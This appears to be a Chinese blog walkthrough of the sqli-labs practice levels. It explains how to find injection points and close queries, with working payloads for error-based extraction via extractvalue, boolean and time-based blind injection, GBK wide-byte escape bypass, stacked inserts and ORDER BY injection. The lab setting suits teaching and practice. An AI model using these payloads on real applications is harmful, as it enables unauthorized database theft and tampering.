less-1
这一题是get型注入,先用单引号,双引号,来判断是否存在注入点。
可以看到报错信息中' '1' ' limit 0,1 ' 中间多了个'这就是我们写进去的' 这样就可以知道 要执行的sql语句是什么了。
select * from xx where id='$id' ;我们要把后面的'注释掉,再用常规注入语句就好了。
less-2
get型注入,先判断注入点,得到下面的报错信息
我们把前后''去掉,因为这是报错时报错信息自己加的,所以报错语句就是 ' limit 0,1 多了个单引号,并且也没法注释。很明显,这就是个数字型的注入。不需要单引号,双引号,直接用注入语句就可。
less-3
get型注入,判断注入点 ,得到报错信息:
看 ‘1’’)的报错信息。可以知道sql 查询语句大概时这样的 select * from xx where ( ' $id ' ) ;所以我们需要 用 ') 后面把‘)注释掉,完成查询语句的闭合,最后再通过注入语句得到信息。
less-4
把括号中的单引号改成了双引号的区别,从报错信息中就能看出来!
less-5
gei型注入,有报错信息
单引号 后面加注释闭合。得到的是:
没有回显,可是有报错,我们就可以用报错注入,
查询表名:1' and extractvalue(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database())))%23 加粗这段便是我们能改的查询语句。
查询列名:1' and extractvalue(1, concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_name='emails')))%23
最后查询字段名::1' and extractvalue(1, concat(0x5c, (select group_concat(id) from emails)))%23 id 是字段,emails是表名
这里也可以使用盲注来注入,,毕竟盲注太麻烦,就不写了。。。
less-6
和上题一样,但是查询语句是这样的
查询语句并没有双引号,但是上面变量id早就给$id 连了个双引号。所以查询语句变为 $sql="select * from users where id="查询语句 " limit 0,1 "
改个双引号就好。
less-7
和上题差不多,但是闭合点我认为是非常难想到的,这里展示下源码
双括号的闭合。你只要' )) # 注释继就行,但是在报错信息不全的提醒下,,如何想到双括号的闭合啊!!!!!我真的很懵。。下次要和给你出个3括号怎么办?? 总有人和我说这是经验! .没错。。现在我告诉你们,这就是经验!
less-8
get 型注入,,没有报错信息,那只能考虑盲注了。
在源码中报错信息都被注释掉了。 首先是查询他的数据库
?id=1' and length(database())=8 --+ 查询他的数据库几位
?id=1' and ascii(substr(database(),1,1))=115 --+ 猜测数据库的第一位的ascii码
?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6 猜测第一张表的名字的长度
就像猜测数据库第一位的ascii码一样,你也同样用ascii(substr()) 来猜测表的名字的ascii 再猜 列名,最后猜字段值。
less-9
这是个基于时间的盲注,从不管你输入id=1 还是id=0 都是一个结果,所以我们要使用延时注入。运用sleep()函数,
' and if(1=0,1, sleep(10)) --+
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+ 这是判断是否时间盲注的语句。如果语句对的并且查询到就会延迟10秒
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
?id=1' and if(length(database())=8,sleep(5),1)--+ 爆数据库的长度
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+ 爆数据库的第一个字的ascii码
?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),1)--+
猜测第四个表的第一位的ascii码, limit 0,1 第一个表 substr(xx,1,1)取第一位的第一个。
less-10
也是一个时间盲注,,他的查询语句和上题不同,,是双引号的查询语句 其他做法是一样的。
less-11
Post型的注入
先来看一手源码:
没有对输入框中的提交信息过滤。所以我们可以直接在输入框中注入
查询语句中 username 和password 都有单引号,都能注入。这里用基本的注入语句就可以了。
less-12
post型注入,先用单双引号判断注入点,有报错信息!
很明显 他的查询语句就是 ,select * from xx where username=("xx")and password=(" xx") limit 0,1; 所以这里的闭合点就是 ”)加注释 #
然后在用常规注入语句就好了
less-13
post型注入,先用单双引号判断注入点,,也有报错信息。
很明显的 用 ’)加注释 闭合就可以了。 但是这题没有回显的,有报错信息就可以用报错注入,
admin ' ) and extractvalue(1,concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()))) # 爆表名
admin ')and extractvalue(1, concat(0x5c, (select group_concat(column_name) from information_schema.columns where table_name='emails'))) # 爆列名
admin') and extractvalue(1, concat(0x5c, (select group_concat(id) from emails))) # 爆字段值
less-14
post型注入 先用单双引号判断注入点,报错信息:
这里很明显 " 号是会报错的,因为多了个“。 那”加上注释# 能成功登陆。
那猜想他的源码应该是 select * from xx where username=" $username " && password =" $password " limit 0,1; “#就可以闭合了,再用常规的爆破注入语句就好。
less-15
post型注入 用单双引号判断注入点,没有报错信息。 那就要试试 admin ' # 或者
admin "# ,admin ' # 发现是登陆成功的。 那么查询语句应该就是 用 单引号 注释来闭合语句的。 这边没有报错信息的话,就用布尔县盲注来进行注入吧。 注入语句就和上面一样操作。
less-16
在这种没用报错信息的注入下,我们就要一个个试试, admin ' # 错误,admin " #错误
admin ") # 对 admin ')错误,其实就是猜测他的查询语句的闭合方式,哪种登陆成功就哪种就是闭合方式! 那我们试出了admin ") # 的闭合 那么再用盲注注入 进行爆库,表,列,值
这是他的源码:
less-17
首先我们看看源码,
check_input 函数
这就是这个系统函数进行的过滤,那么我们只能用密码框来提交注入语句,单双引号判断注入点,又报错信息,很明显的‘ 加注释闭合语句。那就可以用报错语句,和使用上面报错语句就可以了!
less-18
报文头注入和Cookie 注入
X-Forwarded-For 字段可用于注入
User-agent 字段,Referer 字段 ,Cookie字段 可用于注入
(没有很好的过滤情况外!)
这道题一开始就提醒了报文头注入 user_Agent,那想想注入点都不会在输入框中,而是在报文头中的user_Agent,用burp suite 截包,改包,注入 ,因为是有报错信息的,所以我们用报错注入 。报错语句也和上面的报错语句一样使用。
看看这题的源码
check_input 把表单提交的过滤了
宽字节注入
宽字节注入就是利用mysql中的特性,mysql在使用 GBK编码时,会认为两个字符是一个汉字。这样我们就能通过把转义的字符绕过。
addslashes 函数是经常用于sql注入的过滤,在预定义字符前添加反斜杠/。导致查询语句出错。这时我们在预定义字符前加%df,他会和反斜杠/ %5c组成一个汉字,从而使%27 (’)逃逸出来!
那么mysql怎么判断一个字符是不是汉字,根据gbk编码,第一个字节ascii码大于128,基本上就可以了。比如我们不用%df,用%a1也可以:
mysql不仅是使用GBK编码时,会认为两个字符是一个汉字,还有很多多字节编码,也可以进行宽字节注入!我们可以这样认为:只要低位的范围中含有0x5c的编码,就可以进行宽字符注入。
mysql_real_escape_string
必须连接数据库才能使用 他的转义字符为
来看一个具体的用法,
less-36
当你用单双引号进行判断的时候,没用报错,如图
下面给了你提示,,1‘ 被转义成了 1\' 字符串这样导致了你没有报错,看下源码,
这里他用的是mysql_real_escape_string函数,sql查询语句中$id 被单引号闭合,并且还告诉我们有报错信息,print_r(mysql_error())。所以证明1' 被转义成 1\'字符串。那我们就可以通过在\'前加%fg ,%df 这种第一个ascii大于128 的
又报错信息了,说明 有单引号了,这样就可以进行下一步注入了。
进行报错注入的时候发现一个问题,
报错了。这里也有两个单引号,那我们用%df来绕过有用吗?结果是出错了的,因为 %df' security %df' ,我们前面说 %df 和单引号的转义反斜杠 组成了一个汉字,,那么这个汉字就在两个单引号之间了啊,那你查询的数据库名字就出问题了,导致你怎么也查不出表名!这里我们可以使用
用16进制来表达 数据库名字。就可以了!
堆叠注入 stacked injection
注入原理:平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。
使用条件:堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁
less-38 堆叠注入实例
这题就是一个简单的单引号的闭合,关键是在执行完id=1后,我又写了一条语句,添加一条信息到Users表中。
添加成功,这就是堆叠注入。可以执行多条语句!关键还是查询语句要先闭合!
排序注入 order by 注入
就是我们可控制的位置在order by 子句之后,
'select * from xxx order by '$id'';
如何判断这个是可注入点,有无注入点,以及如何闭合时关键。
less-46
这题是数字型的排序注入,如果判断是否存在排序注入呢?
这是降序
升序,排列的顺序改变了,那么就存在排序注入,但是有时候这种判断是没有用的。比如less-47 所以我也没怎么理解!
闭合方法也就之前那些,如果有报错信息的话,那就可以用报错注入语句注入,也可以用盲注,时间盲注。用一些函数来进行盲注
rand((ascii(left(database(),1))=115))
网友评论